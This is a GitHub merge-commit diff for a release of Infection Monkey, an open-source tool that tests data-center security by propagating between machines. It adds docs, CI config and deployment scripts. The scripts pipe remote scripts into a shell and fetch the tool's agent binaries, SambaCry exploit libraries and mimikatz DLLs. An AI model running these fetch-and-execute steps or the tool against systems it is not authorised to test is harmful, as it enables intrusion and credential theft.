Merge pull request #599 from guardicore/release/1.8.0

Release/1.8.0
Changelog will be published soon-ish.
This commit is contained in:
Shay Nehmad 2020-04-27 16:39:10 +03:00 committed by GitHub
commit 9b7d7972b5
No known key found for this signature in database
GPG Key ID: 4AEE18F83AFDEB23
505 changed files with 17773 additions and 11989 deletions


@@ -1,23 +1,29 @@
---
name: 🐛 Bug report
about: Create a report to help us fix things!
---

<!--
Thank you for reporting a bug to make Infection Monkey better.
Please fill in as much of the template below as you're able.
-->

## Describe the bug
A clear and concise description of what the bug is.

## To Reproduce
Steps to reproduce the behavior:
1. Configure the Monkey with X settings
2. Run the monkey on specific machine
3. See error

## Expected behavior
A description of what you expected to happen.

## Screenshots
If applicable, add screenshots to help explain your problem.

## Machine version (please complete the following information):
- OS: Windows or Linux


@@ -0,0 +1,20 @@
---
name: "\U0001F680 Feature request"
about: Suggest an idea for this project
---
<!--
Thank you for suggesting an idea to make Infection Monkey better.
Please fill in as much of the template below as you're able.
-->
**Is your feature request related to a problem? Please describe.**
Please describe the problem you are trying to solve.
**Describe the solution you'd like**
Please describe the desired behavior.
**Describe alternatives you've considered**
Please describe alternative solutions or features you have considered.

.github/ISSUE_TEMPLATE/config.yml (vendored, new file; +8 lines)

@@ -0,0 +1,8 @@
blank_issues_enabled: false
contact_links:
- name: Slack Channel
url: https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LWM0NjVmNWE2ZTMzYzAxOWJiYmMxMzU0NWU3NmUxYjcyNjk0YWY2MDkwODk4NGMyNDU4NzA4MDljOWNmZWViNDU
about: Our community Slack channel - you can ask questions or suggest things here.
- name: FAQs
url: https://www.guardicore.com/infectionmonkey/faq/
about: Frequently Asked Questions - if you have a question, see if we've already answered it!


@@ -1,12 +1,15 @@
# What is this?
Fixes #`put issue number here`.
Add any further explanations here.

## Checklist
* [ ] Have you added an explanation of what your changes do and why you'd like to include them?
* [ ] Have you successfully tested your changes locally?
* [ ] Is the TravisCI build passing?

## Proof that it works
If applicable, add screenshots or log transcripts of the feature working.

## Changes
Are the commit messages enough? If not, elaborate.

Binary files changed:
- .github/attack-report.png (vendored, new file; 198 KiB)
- .github/map-full.png (vendored; 80 KiB → 162 KiB)
- .github/security-report.png (vendored, new file; 122 KiB)
- .github/zero-trust-report.png (vendored, new file; 194 KiB)
.gitmodules (vendored, new file; +4 lines)

@@ -0,0 +1,4 @@
[submodule "monkey/monkey_island/cc/services/attack/attack_data"]
path = monkey/monkey_island/cc/services/attack/attack_data
url = https://github.com/guardicore/cti


@@ -1,18 +1,71 @@
# Infection Monkey travis.yml. See Travis documentation for information about this file structure.

group: travis_latest
language: python
cache: pip
python:
  - 3.7
os: linux

install:
  # Python
  - pip install -r monkey/monkey_island/requirements.txt # for unit tests
  - pip install flake8 pytest dlint # for next stages
  - pip install coverage # for code coverage
  - pip install -r monkey/infection_monkey/requirements.txt # for unit tests

before_script:
  # Set the server config to `testing`. This is required for the UTs to pass.
  - python monkey/monkey_island/cc/set_server_config.py testing

script:
  # Check Python code
  ## Check syntax errors and fail the build if any are found.
  - flake8 . --count --select=E901,E999,F821,F822,F823 --show-source --statistics
  ## Warn about linter issues.
  ### --exit-zero forces Flake8 to use the exit status code 0 even if there are errors, which means this will NOT fail the build.
  ### --count will print the total number of errors.
  ### --statistics counts the number of occurrences of each error/warning code and prints a report.
  ### The output is redirected to a file.
  - flake8 . --count --exit-zero --max-complexity=10 --max-line-length=127 --statistics > flake8_warnings.txt
  ## Display the linter issues
  - cat flake8_warnings.txt
  ## Make sure that we haven't increased the amount of warnings.
  - PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT=190
  - if [ $(tail -n 1 flake8_warnings.txt) -gt $PYTHON_WARNINGS_AMOUNT_UPPER_LIMIT ]; then echo "Too many python linter warnings! Failing this build. Lower the amount of linter errors and try again." && exit 1; fi
  ## Run unit tests
  - cd monkey # This is our source dir
  - python -m pytest # Have to use `python -m pytest` instead of `pytest` to add "{$builddir}/monkey/monkey" to sys.path.
  ## Calculate code coverage
  - coverage run -m pytest
  # Check JS code. The npm install must happen AFTER the flake8 run because the node_modules folder would cause a lot of errors.
  - cd monkey_island/cc/ui
  - npm i
  - npm i -g eslint
  - cd -
  - cd monkey_island/cc/ui
  - eslint ./src --quiet
  - JS_WARNINGS_AMOUNT_UPPER_LIMIT=37
  - eslint ./src --max-warnings $JS_WARNINGS_AMOUNT_UPPER_LIMIT

after_success:
  # Upload code coverage results to codecov.io, see https://github.com/codecov/codecov-bash for more information
  - bash <(curl -s https://codecov.io/bash)

notifications:
  slack: # Notify to slack
    rooms:
      - infectionmonkey:QaXbsx4g7tHFJW0lhtiBmoAg#ci # room: #ci
    on_success: change
    on_failure: always
  email:
    on_success: change
    on_failure: always
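The warning-budget gate in the Travis script above can be exercised on its own. A minimal sketch (the report file and its contents are illustrative; `flake8 --count` prints the total warning count as the last line of its output):

```shell
# Simulate a flake8 report whose last line is the total warning count,
# as produced by `flake8 --count`.
report=$(mktemp)
printf 'foo.py:1:1: E501 line too long\nbar.py:3:1: F401 unused import\n2\n' > "$report"

LIMIT=190
COUNT=$(tail -n 1 "$report")
if [ "$COUNT" -gt "$LIMIT" ]; then
  echo "Too many linter warnings ($COUNT > $LIMIT); failing the build"
  exit 1
fi
echo "Linter warnings within budget ($COUNT <= $LIMIT)"
rm "$report"
```

Because the gate only compares the last line of the report against a fixed budget, lowering the budget over time is a cheap way to ratchet down existing warnings without failing every build immediately.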


@@ -1,4 +1,4 @@
# Hi there 🐵

Thanks for your interest in making the Monkey -- and therefore, your network -- a better place!

@@ -10,8 +10,13 @@ to reproduce. While we'll try to help anyway, focusing us will help us help you

If you want to contribute new code or fix bugs, please read the following sections. You can also contact us (the
maintainers of this project) at our [Slack channel](https://join.slack.com/t/infectionmonkey/shared_invite/enQtNDU5MjAxMjg1MjU1LTM2ZTg0ZDlmNWNlZjQ5NDI5NTM1NWJlYTRlMGIwY2VmZGMxZDlhMTE2OTYwYmZhZjM1MGZhZjA2ZjI4MzA1NDk).

## Submitting Issues
* **Do** write a detailed description of your bug and use a descriptive title.
* **Do** include reproduction steps, stack traces, and anything else that might help us verify and fix your bug.

You can look at [this issue](https://github.com/guardicore/monkey/issues/430) for an example.

## Submitting Code
The following is a *short* list of recommendations. PRs that don't match these criteria won't be closed but it'll be harder to merge the changes into the code.

@@ -24,18 +29,23 @@ The following is a *short* list of recommendations. PRs that don't match these c
Also, please submit PRs to the `develop` branch.

#### Unit Tests
**Do** add unit tests if you think it fits. We place our unit tests in the same folder as the code, with the same
filename, followed by the `_test` suffix. So for example: `somefile.py` will be tested by `somefile_test.py`.
Please try to read some of the existing unit testing code, so you can see some examples.

#### Branches Naming Scheme
**Do** name your branches in accordance with GitFlow. The format is `ISSUE_#/BRANCH_NAME`; for example,
`400/zero-trust-mvp` or `232/improvment/hide-linux-on-cred-maps`.

#### Continuous Integration
We use [TravisCI](https://travis-ci.com/guardicore/monkey) for automatically checking the correctness and quality of submitted
pull requests. If your build fails, it might be because of one of the following reasons:
* Syntax errors.
* Failing unit tests.
* Too many linter warnings.

In any of these cases, you can look for the cause of the failure in the _job log_ in your TravisCI build.

#### Thank you for reading this before opening an issue or a PR, you're already doing good!


@@ -1,25 +1,40 @@
# Infection Monkey
[![GitHub release (latest by date)](https://img.shields.io/github/v/release/guardicore/monkey)](https://github.com/guardicore/monkey/releases)
[![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey)
[![codecov](https://codecov.io/gh/guardicore/monkey/branch/develop/graph/badge.svg)](https://codecov.io/gh/guardicore/monkey)
![GitHub stars](https://img.shields.io/github/stars/guardicore/monkey)
![GitHub commit activity](https://img.shields.io/github/commit-activity/m/guardicore/monkey)

## Data center Security Testing Tool

Welcome to the Infection Monkey!

The Infection Monkey is an open source security tool for testing a data center's resiliency to perimeter breaches and internal server infection. The Monkey uses various methods to self propagate across a data center and reports success to a centralized Monkey Island server.

The Infection Monkey is comprised of two parts:

* **Monkey** - A tool which infects other machines and propagates to them.
* **Monkey Island** - A dedicated server to control and visualize the Infection Monkey's progress inside the data center.

To read more about the Monkey, visit [infectionmonkey.com](https://infectionmonkey.com).

## Screenshots

### Map
<img src=".github/map-full.png" width="800" height="600">

### Security report
<img src=".github/security-report.png" width="800" height="500">

### Zero trust report
<img src=".github/zero-trust-report.png" width="800" height="500">

### ATT&CK report
<img src=".github/attack-report.png" width="900" height="500">

## Main Features

The Infection Monkey uses the following techniques and exploits to propagate to other machines.

@@ -35,23 +50,41 @@ The Infection Monkey uses the following techniques and exploits to propagate to
* Conficker
* SambaCry
* Elastic Search (CVE-2015-1427)
* Weblogic server
* and more

## Setup
Check out the [Setup](https://github.com/guardicore/monkey/wiki/setup) page in the Wiki or a quick getting [started guide](https://www.guardicore.com/infectionmonkey/wt/).

The Infection Monkey supports a variety of platforms, documented [in the wiki](https://github.com/guardicore/monkey/wiki/OS-compatibility).

## Building the Monkey from source
To deploy a development version of the monkey, refer to the readme in the [deployment scripts](deployment_scripts) folder.
If you only want to build the monkey from source, see [Setup](https://github.com/guardicore/monkey/wiki/Setup#compile-it-yourself)
and follow the instructions in the readme files under [infection_monkey](monkey/infection_monkey) and [monkey_island](monkey/monkey_island).

### Build status
| Branch | Status |
| ------ | :----: |
| Develop | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=develop)](https://travis-ci.com/guardicore/monkey) |
| Master | [![Build Status](https://travis-ci.com/guardicore/monkey.svg?branch=master)](https://travis-ci.com/guardicore/monkey) |

## Tests

### Unit Tests
In order to run all of the unit tests, run the command `python -m pytest` in the `monkey` directory.

To get a coverage report, first make sure the `coverage` package is installed using `pip install coverage`. Run the command
`coverage run -m unittest` in the `monkey` directory and then `coverage html`. The coverage report can be found in
`htmlcov/index.html`.

### Blackbox tests
In order to run the Blackbox tests, refer to `envs/monkey_zoo/blackbox/README.md`.

# License
Copyright (c) Guardicore Ltd

See the [LICENSE](LICENSE) file for license rights and limitations (GPLv3).


@@ -1,24 +1,55 @@
# Deployment guide for a development environment

This guide is for you if you wish to develop for Infection Monkey. If you only want to use it, please download the relevant version from [our website](https://infectionmonkey.com).

## Prerequisites
Before running the script you must have `git` installed. If you don't have `git` installed, please follow [this guide](https://git-scm.com/book/en/v2/Getting-Started-Installing-Git).

## Deploy on Windows
Run the following command in powershell:

```powershell
Invoke-WebRequest https://raw.githubusercontent.com/guardicore/monkey/develop/deployment_scripts/deploy_windows.ps1 -OutFile deploy_windows.ps1
```

This will download our deploy script. It's a good idea to read it quickly before executing it!

After downloading that script, execute it in `powershell`.
The first argument is an empty directory (the script can create one). The second argument is which branch you want to clone - by default, the script will check out the `develop` branch. Some example usages:

- `.\deploy_windows.ps1` (Sets up monkey in current directory under .\infection_monkey)
- `.\deploy_windows.ps1 -monkey_home "C:\test"` (Sets up monkey in C:\test)
- `.\deploy_windows.ps1 -branch "master"` (Sets up master branch instead of develop in current dir)

You may also pass in an optional `agents=$false` parameter to disable downloading the latest agent binaries.

### Troubleshooting
- If you run into Execution Policy warnings, you can disable them by prefixing your command like so: `powershell -ExecutionPolicy ByPass -Command "[original command here]"`
- Don't forget to add python to PATH or do so while installing it via this script.

## Deploy on Linux
The Linux deployment script is meant for Ubuntu 16 and Ubuntu 18 machines.

Your user must have root permissions; however, don't run the script as root!
Choose a directory where you have all the relevant permissions, e.g. /home/your_username.

```sh
wget https://raw.githubusercontent.com/guardicore/monkey/develop/deployment_scripts/deploy_linux.sh
```

This will download our deploy script. It's a good idea to read it quickly before executing it!

After downloading that script, execute it in a shell. The first argument should be an absolute path of an empty directory (the script will create one if it doesn't exist; the default is ./infection_monkey). The second parameter is the branch you want to clone (develop by default). Some example usages:

- `./deploy_linux.sh` (deploys under ./infection_monkey)
- `./deploy_linux.sh "/home/test/monkey"` (deploys under /home/test/monkey)
- `./deploy_linux.sh "" "master"` (deploys master branch in script directory)
- `./deploy_linux.sh "/home/user/new" "master"` (if directory "new" is not found creates it and clones master branch into it)

You may also pass in an optional third `false` parameter to disable downloading the latest agent binaries.
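The positional arguments described above (install directory, branch, agent-binaries flag) are read with the shell's `${N:-default}` fallback pattern. A minimal sketch using made-up values:

```shell
# Simulate invoking a deploy script as: ./deploy_linux.sh "/home/test/monkey" ""
set -- "/home/test/monkey" ""

monkey_home=${1:-$(pwd)}   # first argument, defaulting to the current directory
branch=${2:-"develop"}     # second argument; empty or missing falls back to develop
agents=${3:-true}          # third argument; defaults to downloading agent binaries

echo "dir=$monkey_home branch=$branch agents=$agents"
```

Note that `:-` (rather than `-`) treats an empty string the same as a missing argument, which is why passing `""` for the branch still selects `develop`.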


@@ -5,15 +5,17 @@ MONKEY_FOLDER_NAME="infection_monkey"
MONKEY_GIT_URL="https://github.com/guardicore/monkey"

# Monkey binaries
LINUX_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-linux-32"
LINUX_32_BINARY_NAME="monkey-linux-32"
LINUX_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-linux-64"
LINUX_64_BINARY_NAME="monkey-linux-64"
WINDOWS_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-windows-32.exe"
WINDOWS_32_BINARY_NAME="monkey-windows-32.exe"
WINDOWS_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/monkey-windows-64.exe"
WINDOWS_64_BINARY_NAME="monkey-windows-64.exe"

# Other binaries for monkey
TRACEROUTE_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/traceroute64"
TRACEROUTE_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/traceroute32"
SAMBACRY_64_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/sc_monkey_runner64.so"
SAMBACRY_32_BINARY_URL="https://github.com/guardicore/monkey/releases/download/v1.7.0/sc_monkey_runner32.so"


@@ -2,47 +2,48 @@
$MONKEY_FOLDER_NAME = "infection_monkey"
# Url of public git repository that contains monkey's source code
$MONKEY_GIT_URL = "https://github.com/guardicore/monkey"
$MONKEY_RELEASES_URL = $MONKEY_GIT_URL + "/releases"
$MONKEY_LATEST_VERSION = "v1.7.0"
$MONKEY_DOWNLOAD_URL = $MONKEY_RELEASES_URL + "/download/" + $MONKEY_LATEST_VERSION + "/"
# Link to the latest python download or install it manually
$PYTHON_URL = "https://www.python.org/ftp/python/3.7.6/python-3.7.6-amd64.exe"

# Monkey binaries
$LINUX_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-linux-32"
$LINUX_32_BINARY_PATH = "monkey-linux-32"
$LINUX_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-linux-64"
$LINUX_64_BINARY_PATH = "monkey-linux-64"
$WINDOWS_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-windows-32.exe"
$WINDOWS_32_BINARY_PATH = "monkey-windows-32.exe"
$WINDOWS_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "monkey-windows-64.exe"
$WINDOWS_64_BINARY_PATH = "monkey-windows-64.exe"
$SAMBA_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "sc_monkey_runner32.so"
$SAMBA_32_BINARY_NAME = "sc_monkey_runner32.so"
$SAMBA_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "sc_monkey_runner64.so"
$SAMBA_64_BINARY_NAME = "sc_monkey_runner64.so"
$TRACEROUTE_64_BINARY_URL = $MONKEY_DOWNLOAD_URL + "traceroute64"
$TRACEROUTE_32_BINARY_URL = $MONKEY_DOWNLOAD_URL + "traceroute32"

# Other directories and paths (most likely you don't need to configure these)
$MONKEY_ISLAND_DIR = Join-Path "\monkey" -ChildPath "monkey_island"
$MONKEY_DIR = Join-Path "\monkey" -ChildPath "infection_monkey"
$SAMBA_BINARIES_DIR = Join-Path -Path $MONKEY_DIR -ChildPath "\bin"
$MK32_DLL = "mk32.zip"
$MK64_DLL = "mk64.zip"
$TEMP_PYTHON_INSTALLER = ".\python.exe"
$TEMP_MONGODB_ZIP = ".\mongodb.zip"
$TEMP_OPEN_SSL_ZIP = ".\openssl.zip"
$TEMP_CPP_INSTALLER = "cpp.exe"
$TEMP_NPM_INSTALLER = "node.msi"
$TEMP_UPX_ZIP = "upx.zip"
$UPX_FOLDER = "upx-3.96-win64"

# Other url's
$MONGODB_URL = "https://downloads.mongodb.org/win32/mongodb-win32-x86_64-2012plus-v4.2-latest.zip"
$OPEN_SSL_URL = "https://indy.fulgan.com/SSL/openssl-1.0.2u-x64_86-win64.zip"
$CPP_URL = "https://go.microsoft.com/fwlink/?LinkId=746572"
$NPM_URL = "https://nodejs.org/dist/v12.14.1/node-v12.14.1-x64.msi"
$MK32_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk32.zip"
$MK64_DLL_URL = "https://github.com/guardicore/mimikatz/releases/download/1.1.0/mk64.zip"
$UPX_URL = "https://github.com/upx/upx/releases/download/v3.96/upx-3.96-win64.zip"
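Both config files build their download links by concatenating a releases base URL, a version tag, and an asset name, so bumping `$MONKEY_LATEST_VERSION` updates every binary URL at once. The same pattern in POSIX shell:

```shell
# Assemble a release-asset URL the way the config files above do.
MONKEY_GIT_URL="https://github.com/guardicore/monkey"
MONKEY_LATEST_VERSION="v1.7.0"
MONKEY_DOWNLOAD_URL="${MONKEY_GIT_URL}/releases/download/${MONKEY_LATEST_VERSION}/"

WINDOWS_64_BINARY_URL="${MONKEY_DOWNLOAD_URL}monkey-windows-64.exe"
echo "$WINDOWS_64_BINARY_URL"
```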

deployment_scripts/deploy_linux.sh (Normal file → Executable file; 252 lines changed)

@@ -1,139 +1,223 @@
#!/bin/bash #!/bin/bash
source config
exists() {
command -v "$1" >/dev/null 2>&1
}
is_root() {
return $(id -u)
}
has_sudo() {
# 0 true, 1 false
timeout 1 sudo id && return 0 || return 1
}
handle_error() {
echo "Fix the errors above and rerun the script"
exit 1
}
log_message() {
echo -e "\n\n"
echo -e "DEPLOYMENT SCRIPT: $1"
}
config_branch=${2:-"develop"}
config_url="https://raw.githubusercontent.com/guardicore/monkey/${config_branch}/deployment_scripts/config"
if (! exists curl) && (! exists wget); then
log_message 'Your system does not have curl or wget, exiting'
exit 1
fi
file=$(mktemp)
# shellcheck disable=SC2086
if exists wget; then
# shellcheck disable=SC2086
wget --output-document=$file "$config_url"
else
# shellcheck disable=SC2086
curl -s -o $file "$config_url"
fi
log_message "downloaded configuration"
# shellcheck source=deployment_scripts/config
# shellcheck disable=SC2086
source $file
log_message "loaded configuration"
# shellcheck disable=SC2086
# rm $file
# Setup monkey either in dir required or current dir # Setup monkey either in dir required or current dir
monkey_home=${1:-`pwd`} monkey_home=${1:-$(pwd)}
if [[ $monkey_home == `pwd` ]]; then if [[ $monkey_home == $(pwd) ]]; then
monkey_home="$monkey_home/$MONKEY_FOLDER_NAME" monkey_home="$monkey_home/$MONKEY_FOLDER_NAME"
fi fi
# We can set main paths after we know the home dir # We can set main paths after we know the home dir
ISLAND_PATH="$monkey_home/monkey/monkey_island" ISLAND_PATH="$monkey_home/monkey/monkey_island"
MONKEY_COMMON_PATH="$monkey_home/monkey/common/"
MONGO_PATH="$ISLAND_PATH/bin/mongodb" MONGO_PATH="$ISLAND_PATH/bin/mongodb"
MONGO_BIN_PATH="$MONGO_PATH/bin"
ISLAND_DB_PATH="$ISLAND_PATH/db"
ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries" ISLAND_BINARIES_PATH="$ISLAND_PATH/cc/binaries"
INFECTION_MONKEY_DIR="$monkey_home/monkey/infection_monkey"
MONKEY_BIN_DIR="$INFECTION_MONKEY_DIR/bin"
handle_error () { if is_root; then
echo "Fix the errors above and rerun the script" log_message "Please don't run this script as root"
exit 1 exit 1
} fi
log_message () { HAS_SUDO=$(has_sudo)
echo -e "\n\n-------------------------------------------" if [[ ! $HAS_SUDO ]]; then
echo -e "DEPLOYMENT SCRIPT: $1" log_message "You need root permissions for some of this script operations. Quiting."
echo -e "-------------------------------------------\n" exit 1
}
sudo -v
if [[ $? != 0 ]]; then
echo "You need root permissions for some of this script operations. Quiting."
exit 1
fi fi
if [[ ! -d ${monkey_home} ]]; then if [[ ! -d ${monkey_home} ]]; then
mkdir -p ${monkey_home} mkdir -p "${monkey_home}"
fi fi
git --version &>/dev/null if ! exists git; then
git_available=$? log_message "Please install git and re-run this script"
if [[ ${git_available} != 0 ]]; then exit 1
echo "Please install git and re-run this script"
exit 1
fi fi
log_message "Cloning files from git" log_message "Cloning files from git"
branch=${2:-"develop"} branch=${2:-"develop"}
if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned if [[ ! -d "$monkey_home/monkey" ]]; then # If not already cloned
git clone --single-branch -b $branch ${MONKEY_GIT_URL} ${monkey_home} 2>&1 || handle_error git clone --single-branch --recurse-submodules -b "$branch" "${MONKEY_GIT_URL}" "${monkey_home}" 2>&1 || handle_error
chmod 774 -R ${monkey_home} chmod 774 -R "${monkey_home}"
fi fi
# Create folders # Create folders
log_message "Creating island dirs under $ISLAND_PATH" log_message "Creating island dirs under $ISLAND_PATH"
mkdir -p ${MONGO_BIN_PATH} mkdir -p "${MONGO_PATH}" || handle_error
mkdir -p ${ISLAND_DB_PATH} mkdir -p "${ISLAND_BINARIES_PATH}" || handle_error
mkdir -p ${ISLAND_BINARIES_PATH} || handle_error
# Detect the command that calls python 3.7
python_cmd=""
if [[ $(python --version 2>&1) == *"Python 3.7"* ]]; then
  python_cmd="python"
fi
if [[ $(python37 --version 2>&1) == *"Python 3.7"* ]]; then
  python_cmd="python37"
fi
if [[ $(python3.7 --version 2>&1) == *"Python 3.7"* ]]; then
  python_cmd="python3.7"
fi
if [[ ${python_cmd} == "" ]]; then
  log_message "Python 3.7 command not found. Installing python 3.7."
  sudo add-apt-repository ppa:deadsnakes/ppa
  sudo apt-get update
  sudo apt install python3.7 python3.7-dev
  log_message "Python 3.7 is now available with command 'python3.7'."
  python_cmd="python3.7"
fi

log_message "Installing build-essential"
sudo apt install build-essential

log_message "Installing or updating pip"
# shellcheck disable=SC2086
pip_url=https://bootstrap.pypa.io/get-pip.py
if exists wget; then
  wget --output-document=get-pip.py $pip_url
else
  curl $pip_url -o get-pip.py
fi
${python_cmd} get-pip.py
rm get-pip.py
log_message "Installing island requirements"
requirements_island="$ISLAND_PATH/requirements.txt"
${python_cmd} -m pip install -r "${requirements_island}" --user --upgrade || handle_error

log_message "Installing monkey requirements"
sudo apt-get install libffi-dev upx libssl-dev libc++1
requirements_monkey="$INFECTION_MONKEY_DIR/requirements.txt"
${python_cmd} -m pip install -r "${requirements_monkey}" --user --upgrade || handle_error

agents=${3:-true}
# Download binaries
if [ "$agents" = true ]; then
  log_message "Downloading binaries"
  if exists wget; then
    wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_32_BINARY_URL}
    wget -c -N -P ${ISLAND_BINARIES_PATH} ${LINUX_64_BINARY_URL}
    wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_32_BINARY_URL}
    wget -c -N -P ${ISLAND_BINARIES_PATH} ${WINDOWS_64_BINARY_URL}
  else
    curl -o ${ISLAND_BINARIES_PATH}/monkey-linux-32 ${LINUX_32_BINARY_URL}
    curl -o ${ISLAND_BINARIES_PATH}/monkey-linux-64 ${LINUX_64_BINARY_URL}
    curl -o ${ISLAND_BINARIES_PATH}/monkey-windows-32.exe ${WINDOWS_32_BINARY_URL}
    curl -o ${ISLAND_BINARIES_PATH}/monkey-windows-64.exe ${WINDOWS_64_BINARY_URL}
  fi
fi

# Allow them to be executed
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_32_BINARY_NAME"
chmod a+x "$ISLAND_BINARIES_PATH/$LINUX_64_BINARY_NAME"
# If the user hasn't installed mongo manually, check if we can install it with our script
if ! exists mongod; then
  log_message "Installing MongoDB"
  "${ISLAND_PATH}"/linux/install_mongo.sh ${MONGO_PATH} || handle_error
fi

log_message "Installing openssl"
sudo apt-get install openssl

# Generate SSL certificate
log_message "Generating certificate"
"${ISLAND_PATH}"/linux/create_certificate.sh ${ISLAND_PATH}/cc
# Update node
if ! exists npm; then
  log_message "Installing nodejs"
  node_src=https://deb.nodesource.com/setup_12.x
  if exists curl; then
    curl -sL $node_src | sudo -E bash -
  else
    wget -q -O - $node_src | sudo -E bash -
  fi
  sudo apt-get install -y nodejs
fi

pushd "$ISLAND_PATH/cc/ui" || handle_error
npm install sass-loader node-sass webpack --save-dev
npm update

log_message "Generating front end"
npm run dist
popd || handle_error
# Making dir for binaries
mkdir "${MONKEY_BIN_DIR}"

# Download sambacry binaries
log_message "Downloading sambacry binaries"
# shellcheck disable=SC2086
if exists wget; then
  wget -c -N -P "${MONKEY_BIN_DIR}" ${SAMBACRY_64_BINARY_URL}
  wget -c -N -P "${MONKEY_BIN_DIR}" ${SAMBACRY_32_BINARY_URL}
else
  curl -o ${MONKEY_BIN_DIR}/sc_monkey_runner64.so ${SAMBACRY_64_BINARY_URL}
  curl -o ${MONKEY_BIN_DIR}/sc_monkey_runner32.so ${SAMBACRY_32_BINARY_URL}
fi

# Download traceroute binaries
log_message "Downloading traceroute binaries"
# shellcheck disable=SC2086
if exists wget; then
  wget -c -N -P "${MONKEY_BIN_DIR}" ${TRACEROUTE_64_BINARY_URL}
  wget -c -N -P "${MONKEY_BIN_DIR}" ${TRACEROUTE_32_BINARY_URL}
else
  curl -o ${MONKEY_BIN_DIR}/traceroute64 ${TRACEROUTE_64_BINARY_URL}
  curl -o ${MONKEY_BIN_DIR}/traceroute32 ${TRACEROUTE_32_BINARY_URL}
fi

sudo chmod +x "${INFECTION_MONKEY_DIR}/build_linux.sh"

log_message "Deployment script finished."
exit 0

param(
    [Parameter(Mandatory = $false, Position = 0)]
    [String] $monkey_home = (Get-Item -Path ".\").FullName,

    [Parameter(Mandatory = $false, Position = 1)]
    [System.String]
    $branch = "develop",

    [Parameter(Mandatory = $false, Position = 2)]
    [Bool]
    $agents = $true
)

function Deploy-Windows([String] $monkey_home = (Get-Item -Path ".\").FullName, [String] $branch = "develop")
{
    Write-Output "Downloading to $monkey_home"
    Write-Output "Branch $branch"
    # Set variables for script execution
    [Net.ServicePointManager]::SecurityProtocol = [Net.SecurityProtocolType]::Tls12
    $webClient = New-Object System.Net.WebClient

    # Import the config variables
    $config_filename = "config.ps1"
    $config_url = "https://raw.githubusercontent.com/guardicore/monkey/" + $branch + "/deployment_scripts/config.ps1"
    $webClient.DownloadFile($config_url, $config_filename)
    . ./config.ps1
    "Config variables from config.ps1 imported"
    Remove-Item $config_filename

    # If we want monkey in current dir we need to create an empty folder for source files
    if ((Join-Path $monkey_home '') -eq (Join-Path (Get-Item -Path ".\").FullName ''))
    {
        $monkey_home = Join-Path -Path $monkey_home -ChildPath $MONKEY_FOLDER_NAME
    }

    # We check if git is installed
    try
    {
    }

    # Download the monkey
    $command = "git clone --single-branch --recurse-submodules -b $branch $MONKEY_GIT_URL $monkey_home 2>&1"
    Write-Output $command
    $output = cmd.exe /c $command
    $binDir = (Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\bin")
    if ($output -like "*already exists and is not an empty directory.*")
    {
        "Assuming you already have the source directory. If not, make sure to set an empty directory as monkey's home directory."
    }
    elseif ($output -like "fatal:*")
    {
        "Error while cloning monkey from the repository:"
        $output
        return
    }
    else
    {
        "Monkey cloned from the repository"
        # Create bin directory
        New-Item -ItemType directory -path $binDir
    try
    {
        $version = cmd.exe /c '"python" --version 2>&1'
        if ($version -like 'Python 3.*')
        {
            "Python 3.* was found, installing dependencies"
        }
        else
        {
            throw System.Management.Automation.CommandNotFoundException
        }
    }
    catch [System.Management.Automation.CommandNotFoundException]
    {
        "Downloading python 3 ..."
        "Select 'add to PATH' when installing"
        $webClient.DownloadFile($PYTHON_URL, $TEMP_PYTHON_INSTALLER)
        Start-Process -Wait $TEMP_PYTHON_INSTALLER -ErrorAction Stop
        $env:Path = [System.Environment]::GetEnvironmentVariable("Path", "Machine") + ";" + [System.Environment]::GetEnvironmentVariable("Path", "User")
        Remove-Item $TEMP_PYTHON_INSTALLER

        # Check if installed correctly
        $version = cmd.exe /c '"python" --version 2>&1'
        if ($version -like '* is not recognized*')
        {
            "Python is not found in PATH. Add it to PATH and relaunch the script."
            return
        }
    }
    "Upgrading pip..."
    $output = cmd.exe /c 'python -m pip install --user --upgrade pip 2>&1'
    $output
    if ($output -like '*No module named pip*')
    {
        "Make sure pip module is installed and re-run this script."
        return
    }

    "Installing python packages for island"
    $islandRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_ISLAND_DIR | Join-Path -ChildPath "\requirements.txt" -ErrorAction Stop
    & python -m pip install --user -r $islandRequirements

    "Installing python packages for monkey"
    $monkeyRequirements = Join-Path -Path $monkey_home -ChildPath $MONKEY_DIR | Join-Path -ChildPath "\requirements.txt"
    & python -m pip install --user -r $monkeyRequirements

    $user_python_dir = cmd.exe /c 'py -m site --user-site'
    $user_python_dir = Join-Path (Split-Path $user_python_dir) -ChildPath "\Scripts"
    if (!($ENV:Path | Select-String -SimpleMatch $user_python_dir))
    {
        "Adding python scripts path to user's env"
        $env:Path += ";" + $user_python_dir
        [Environment]::SetEnvironmentVariable("Path", $env:Path, "User")
    }
    # Download mongodb
    if (!(Test-Path -Path (Join-Path -Path $binDir -ChildPath "mongodb")))
    {
        "Downloading mongodb ..."
        $webClient.DownloadFile($MONGODB_URL, $TEMP_MONGODB_ZIP)
        "Unzipping mongodb"
        Expand-Archive $TEMP_MONGODB_ZIP -DestinationPath $binDir
        # Get unzipped folder's name
